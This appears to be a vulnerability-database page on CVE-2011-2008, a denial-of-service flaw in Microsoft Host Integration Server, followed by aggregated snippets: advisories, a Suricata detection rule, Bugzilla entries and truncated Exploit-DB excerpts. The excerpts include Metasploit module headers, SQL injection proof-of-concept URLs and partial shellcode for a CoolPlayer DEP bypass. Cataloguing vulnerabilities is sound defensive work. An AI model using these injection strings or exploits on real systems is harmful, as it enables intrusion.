CVE-2011-2008
Published: 2011-10-12
Priority: P4 (30) · CVSS 2.0: 5 (medium)
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P
EPSS: 21.34% (97.3rd percentile)
Microsoft Host Integration Server (HIS) 2004 SP1, 2006 SP1, 2009, and 2010 allows remote attackers to cause a denial of service (SNA Server service outage) via crafted TCP or UDP traffic, aka "Access of Unallocated Memory DoS Vulnerability."
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | host_integration_server | — | — |
| microsoft | host_integration_server | — | — |
| microsoft | host_integration_server | — | — |
| microsoft | host_integration_server | — | — |
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:N/I:N/A:P |
| vendor_redhat | — | 6.9 | MEDIUM | — |
GHSA
GHSA-v93c-j87p-pp29 · ghsa_unreviewed · 2022-05-14 · CVE-2011-2008 [MEDIUM] · CWE-20
Microsoft Host Integration Server (HIS) 2004 SP1, 2006 SP1, 2009, and 2010 allows remote attackers to cause a denial of service (SNA Server service outage) via crafted TCP or UDP traffic, aka "Access of Unallocated Memory DoS Vulnerability."
Kernel
namei: allow restricted O_CREAT of FIFOs and regular files
kernel_security · 2018-08-23 · CVSS 7.2 · CVE-2000-1134 [HIGH]
Disallows open of FIFOs or regular files not owned by the user in world
writable sticky directories, unless the owner is the same as that of the
directory or the file is opened without the O_CREAT flag. The purpose
is to make data spoofing attacks harder. This protection can be turned
on and off separately for FIFOs and regular files via sysctl, just like
the symlinks/hardlinks protection. This patch is based on Openwall's
"HARDEN_FIFO" feature by Solar Designer.
This is a brief list of old vulnerabilities that could have been prevented
by this feature, some of them even allow for privilege escalation:
CVE-2000-1134
CVE-2007-3852
CVE-2008-0525
CVE-2009-0416
CVE-2011-4834
CVE-2015-1838
CVE-2015-7442
CVE-2016-7489
This list is no
VMware
VMSA-2011-0008: VMware vCenter Server and vSphere Client security vulnerabilities
vendor_vmware · 2011-05-05 · CVSS 4.3 · CVE-2011-0426 [MEDIUM]

a. vCenter Server Directory Traversal vulnerability

A directory traversal vulnerability allows an attacker to remotely retrieve files from vCenter Server without authentication. In order to exploit this vulnerability, the attacker will need to have access to the network on which the vCenter Server host resides. In case vCenter Server is installed on Windows 2008 or Windows 2008 R2, the security vulnerability is not present. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2011-0426 to this issue.

| VMware Product | Product Version | Running on | Replace with/Apply Patch |
|---|---|---|---|
| vCenter | … | … | … |
Red Hat
bash: Insecure temporary file use in aliasconv.sh, aliasconv.bash, cshtobash (symlink attack)
vendor_redhat · 2008-08-13 · CVSS 6.9 · CVE-2008-5374 [MEDIUM]
bash-doc 3.2 allows local users to overwrite arbitrary files via a symlink attack on a /tmp/cb#####.? temporary file, related to the (1) aliasconv.sh, (2) aliasconv.bash, and (3) cshtobash scripts.
Statement: This issue has been addressed in Red Hat Enterprise Linux 4 via RHSA-2011:0261 advisory. This issue has been addressed in Red Hat Enterprise Linux 5 via RHSA-2011:1073 advisory.
Suricata
ET WEB_CLIENT Adobe Acrobat Util.printf Buffer Overflow Attempt
suricata · 2011-07-01 · CVE-2008-2992
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_CLIENT Adobe Acrobat Util.printf Buffer Overflow Attempt"; flow:established,to_client; file.data; content:"util.printf|28 22 25|"; nocase; fast_pattern; pcre:"/util.printf\x28\x22\x25[^\x2C\x29]*f\x22\x2C/i"; reference:url,www.coresecurity.com/content/adobe-reader-buffer-overflow; reference:bid,30035; reference:cve,2008-2992; classtype:attempted-user; sid:2013152; rev:4; metadata:affected_product Web_Browsers, affected_product Web_Browser_Plugins, attack_target Client_Endpoint, created_at 2011_07_01, cve CVE_2008_2992, deployment Perimeter, confidence High, signature_severity Major, tag Web_Client_Attacks, updated_at 2024_04_09;)
Exploit-DB
Microsoft Windows (x86) - 'afd.sys' Local Privilege Escalation (MS11-046)
exploitdb · 2016-10-18 · CVE-2011-1249
---
/*
################################################################
# Exploit Title: Windows x86 (all versions) AFD privilege escalation (MS11-046)
# Date: 2016-10-16
# Exploit Author: Tomislav Paskalev
# Vulnerable Software:
# Windows XP SP3 x86
# Windows XP Pro SP2 x64
# Windows Server 2003 SP2 x86
# Windows Server 2003 SP2 x64
# Windows Server 2003 SP2 Itanium-based Systems
# Windows Vista SP1 x86
# Windows Vista SP2 x86
# Windows Vista SP1 x64
# Windows Vista SP2 x64
# Windows Server 2008 x86
# Windows Server 2008 SP2 x86
# Windows Server 2008 x64
# Windows Server 2008 SP2 x64
# Windows Server 2008 Itanium-based Systems
# Windows Server 2008 SP2 Itanium-based Systems
# Windows 7 x86
# Windows 7 SP1 x86
# Wi
Exploit-DB
Siemens SIMATIC WinCC Flexible (Runtime) - Multiple Vulnerabilities
exploitdb · 2011-11-28 · CVE-2011-4879
---
#######################################################################
Luigi Auriemma
Application: Siemens SIMATIC WinCC flexible (Runtime)
http://www.automation.siemens.com/mcms/human-machine-interface/en/visualization-software/wincc-flexible/wincc-flexible-runtime/Pages/Default.aspx
Versions: 2008 SP2 + security patch 1
Platforms: Windows
Bugs: A] HmiLoad strings stack overflow
B] HmiLoad directory traversal
C] HmiLoad various Denials of Service
D] miniweb directory traversal
E] miniweb arbitrary memory read access
Exploitation: remote
Date: 28 Nov 2011
Author: Luigi Auriemma
e-mail: [email protected]
web: aluigi.org
#######################################################################
1) Introduction
2
Exploit-DB
phpScheduleIt 1.2.10 - 'reserve.php' Arbitrary Code Injection (Metasploit)
exploitdb · 2011-10-26 · CVE-2008-6132
---
##
# $Id: phpscheduleit_start_date.rb 14073 2011-10-26 18:06:12Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Code Injection',
'Description' => %q{
This module exploits an arbitrary PHP code execution flaw in the phpScheduleIt
software. This vulnerability is only exploitable when the magic_quotes_gpc PHP
option is 'off'. Authentication is not required to exploit the bug.
Version 1.2.10 and
Exploit-DB
TugZip 3.5 Archiver - '.ZIP' File Parsing Buffer Overflow (Metasploit)
exploitdb · 2011-10-11 · CVE-2008-4779
---
##
# $Id: tugzip.rb 13868 2011-10-11 03:30:14Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex/zip'
class Metasploit3 'TugZip 3.5 Zip File Parsing Buffer Overflow Vulnerability',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability
in the latest version 3.5 of TugZip archiving utility.
In order to trigger the vulnerability, an attacker must convince someone
to load a specially crafted zip file with TugZip by double click or file op
Exploit-DB
Google Chrome < 14.0.835.163 - '.pdf' File Handling Memory Corruption
exploitdb · 2011-10-04 · CVSS 6.8 · CVE-2011-2841 [MEDIUM]
---
Google Chrome = 14.0.835.163
Discovered by: Mario Gomes
----------------Summary----------------
Google Chrome is a web browser developed by Google that uses the WebKit layout engine.
It was first released as a beta version for Microsoft Windows on September 2, 2008, and the public stable release was on December 11, 2008.
The name is derived from the graphical user interface frame, or "chrome", of web browsers.
As of August 2011, Chrome is the third most widely used browser with 23.16% worldwide usage share of web browsers, according to StatCounter.(From Wikipedia)
----------------Description----------------
Google Chrome suffers from a memory corruption vulnerability that occurs in the manipulation of PDF files.
The failure occurs when the browser opens an HTML file that contains mul
Exploit-DB
Black Ice Cover Page SDK - Insecure Method 'DownloadImageFileURL()' (Metasploit)
exploitdb · 2011-06-20 · CVE-2008-2683
---
Blackice Cover Page SDK insecure method DownloadImageFileURL() exploit
arg1="http://www.google.com/robots.txt"
arg2="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\robots.txt"
target.DownloadImageFileURL arg1 ,arg2
# MSF Module
##
# $Id: blackice_coverpage_download.rb 12540 2011-06-20 20:43:19Z mr_me $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 OperatingSystems::WINDOWS,
:javascript => true,
:rank => NormalRanking,
:vuln_test => n
Exploit-DB
AWStats Totals 1.14 multisort - Remote Command Execution (Metasploit)
exploitdb · 2011-05-25 · CVE-2008-3922
---
##
# $Id: awstatstotals_multisort.rb 12715 2011-05-25 10:45:36Z patrickw $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'AWStats Totals = %q{
This module exploits an arbitrary command execution vulnerability in the
AWStats Totals PHP script. AWStats Totals version v1.0 - v1.14 are vulnerable.
},
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 12715 $',
'References' =>
[
['CVE', '2008-3922'],
['OSVDB', '47807'],
['BID', '30856'],
['URL
Exploit-DB
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (via SQL Injection) (Metasploit)
exploitdb · 2011-02-08 · CVE-2008-5416
---
##
# $Id: ms09_004_sp_replwritetovarbin_sqli.rb 11730 2011-02-08 23:31:44Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection',
'Description' => %q{
A heap-based buffer overflow can occur when calling the undocumented
"sp_replwritetovarbin" extended stored procedure. This vulnerability affects
all versions of Microsoft SQL Server 2000 and 2005, Window
Exploit-DB
VideoLAN VLC Media Player 0.9.4 - TiVo Buffer Overflow (Metasploit)
exploitdb · 2011-02-02 · CVE-2008-4654
---
##
# $Id: videolan_tivo.rb 11701 2011-02-02 21:47:02Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'VideoLAN VLC TiVo Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in VideoLAN VLC 0.9.4.
By creating a malicious TY file, a remote attacker could overflow a
buffer and execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => 'MC',
'Version' => '$Revision: 11701 $',
'References' =>
[
[ 'CVE', '2008-4654' ],
[ 'OSVDB', '49181'
Exploit-DB
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (Metasploit)
exploitdb · 2011-01-24 · CVE-2008-5416
---
##
# $Id: ms09_004_sp_replwritetovarbin.rb 11631 2011-01-24 19:37:58Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft SQL Server sp_replwritetovarbin Memory Corruption',
'Description' => %q{
A heap-based buffer overflow can occur when calling the undocumented
"sp_replwritetovarbin" extended stored procedure. This vulnerability affects
all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database,
and Microsoft Desktop
Exploit-DB
Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067) (Metasploit)
exploitdb · 2011-01-21 · CVE-2008-4250
---
##
# $Id: ms08_067_netapi.rb 11614 2011-01-21 04:09:48Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft Server Service Relative Path Stack Corruption',
'Description' => %q{
This module exploits a parsing flaw in the path canonicalization code of
NetAPI32.dll through the Server Service. This module is capable of bypassing
NX on some operating systems and service packs. The correct target must be
used to prevent the Server Service
Exploit-DB
phpCMS 2008 - SQL Injection
exploitdb · 2011-01-20 · CVE-2011-0645
---
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-{In The Name Of Allah The Mercifull}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[~] Type: REMOTE SQL iNJECTioN
[~] Vendor: www.phpcms.cn
[+] Software: Phpcms 2008 V2
[+] author: ((R3d-D3v!L))
[~]
[+] TEAM: Xp10_hACKEr & 403-T3AM
[~]
[?] contact: X[at]hotmail.co.jp
[-]
[?] Date: 17.jan.2011
[?] T!ME: 05:15 am GMT
[?] Home: WwW.XP10.COM
[^] Xp10_hAcKEr
[?]
# REMOTE SQL iNJECTioN Vulnerabilities
[*] Err0r C0N50L3:
http://server/bbs/phpcms_th/flash_upload.php?modelid= EV!L INJECT!ON
[*] proof of concept =
http://server/bbs/phpcms_th/flash_upload.php?modelid=1+order+by+20-- (false)
http://server/bbs/phpcms_th/flash_upload.php?modelid=1+order+by+19-- (TruE)
Already Tested on Win Xp
[~]-----------------------
Exploit-DB
phpCMS 2008 V2 - 'data.php' SQL Injection
exploitdb · 2011-01-17 · CVE-2011-0645
---
source: https://www.securityfocus.com/bid/45913/info
PHPCMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
PHPCMS 2008 V2 is vulnerable; other versions may also be affected.
http://www.example.com/path/data.php?action=get&where_time=-1+union+all+select+1,database()--
Exploit-DB
Signed Applet Social Engineering - Code Execution (Metasploit)
exploitdb · 2011-01-08 · CVSS 10.0 · CVE-2008-5353 [CRITICAL]
---
##
# $Id: java_signed_applet.rb 11516 2011-01-08 01:13:26Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex'
class Metasploit3 'Signed Applet Social Engineering Code Exec',
'Description' => %q{
This exploit dynamically creates an applet via the Msf::Exploit::Java mixin, converts it
to a .jar file, then signs the .jar with a dynamically created certificate containing
values of your choosing. This is presented to the end user via a web page with an applet
tag, loading the sig
Exploit-DB
Fonality trixbox CE 2.6.1 - 'langChoice' Local File Inclusion (Metasploit)
exploitdb · 2011-01-08 · CVE-2008-6825
---
##
# $Id: trixbox_langchoice.rb 11516 2011-01-08 01:13:26Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
# -*- coding: utf-8 -*-
require 'msf/core'
class Metasploit3 'Trixbox langChoice PHP Local File Inclusion',
'Description' => %q{
This module injects php into the trixbox session file and then, in a second call, evaluates
that code by manipulating the langChoice parameter as described in OSVDB-50421.
},
'Author' => ['chao-mu'],
'License' => BSD_LICENSE,
'Version' => '$Revision: 11516 $',
Exploit-DB
CoolPlayer 2.18 - DEP Bypass
exploitdb · 2011-01-02 · CVE-2008-3408
---
# Exploit Title: CoolPlayer 2.18 DEP Bypass
# Date: January 2, 2011
# Author: Blake
# Version: 2.18
# Tested on: Windows XP SP3 running in Virtualbox
# Uses SetProcessDEPPolicy() to disable DEP for the process
# Thanks to mr_me for the encouragement
# Exploit-DB Notes: May not work on all Win XP SP3 machines
print "\n============================"
print "CoolPlayer 2.18 DEP Bypass"
print "Written by Blake"
print "============================\n"
# windows/exec calc.exe 227 bytes - 240 bytes of shellcode space available
shellcode =(
"\xda\xda\xd9\x74\x24\xf4\xbf\xe7\x18\x22\xfb\x2b\xc9\xb1\x33"
"\x5e\x31\x7e\x17\x83\xee\xfc\x03\x99\x0b\xc0\x0e\x99\xc4\x8d"
"\xf1\x61\x15\xee\x78\x84\x24\x3c\x1e\xcd\x15\xf0\x54\x83\x95"
"\x7b\x38\x37\x2d\x09\x95\x38\x86\xa4\
Bugzilla
CVE-2011-4324 kernel: nfsv4: mknod(2) DoS
bugzilla · 2011-11-21 · CVSS 4.9 · CVE-2011-4324 [MEDIUM]
Creating a file with the mknod(2) syscall on an nfsv4 mount can trigger BUG().
Discussion:
Eryu Guan 2011-11-18 02:16:30 EST
Upstream commit
commit dc0b027dfadfcb8a5504f7d8052754bf8d501ab9
Author: Trond Myklebust
Date: Tue Dec 23 15:21:56 2008 -0500
NFSv4: Convert the open and close ops to use fmode
Signed-off-by: Trond Myklebust
removed the BUGON() at fs/nfs/nfs4xdr.c:894
---
Statement:
This issue did not affect the Linux kernels as shipped with Red Hat Enterprise Linux 6 and Red Hat Enterprise MRG as they did not have the vulnerable code as introduced in history:1a7bc914. This has been addressed in Red Hat Enterprise Linux 5 via https://rhn.redhat.com/errata/RHSA-2012-0007.html. Red Hat Enterprise Linux 4 is now in Production 3 of the maint
Bugzilla
CVE-2008-7293 firefox: unable to restrict modifications to cookies in HTTPS sessions due to lack of HSTS support
bugzilla · 2011-08-12 · CVSS 5.8 · CVE-2008-7293 [MEDIUM]
Common Vulnerabilities and Exposures assigned an identifier CVE-2008-7293 to
the following vulnerability:
Name: CVE-2008-7293
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7293
Assigned: 20110809
Reference: http://code.google.com/p/browsersec/wiki/Part2#Same-origin_policy_for_cookies
Reference: http://michael-coates.blogspot.com/2010/01/cookie-forcing-trust-your-cookies-no.html
Reference: http://scarybeastsecurity.blogspot.com/2008/11/cookie-forcing.html
Reference: http://scarybeastsecurity.blogspot.com/2011/02/some-less-obvious-benefits-of-hsts.html
Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=660053
Reference: http://hacks.mozilla.org/2010/08/firef
Bugzilla
CVE-2008-5299 chm2pdf insecure temporary file symlink flaw
bugzilla · 2008-12-03 · CVSS 6.9 · CVE-2008-5299 [MEDIUM]
chm2pdf 0.9 allows user-assisted local users to delete arbitrary files via a symlink attack on .chm files in the (1) /tmp/chm2pdf/work or (2) /tmp/chm2pdf/orig temporary directories.
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=501959
Discussion:
Let's try this again. chm2pdf in Fedora 14 is still vulnerable to this. A
patch was provided in the Debian bug:
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=501959#20
I can't think of a reason not to use it.
---
Created chm2pdf tracking bugs for this issue
Affects: fedora-all [bug 665494]
---
This flaw was corrected in Fedora 14:
chm2pdf-0.9.1-9.fc14 (FEDORA-2011-0454)
and Fedora 13:
chm2pdf-0.9.1-8.fc13 (FEDORA-2011-0467)
References
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-082
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12915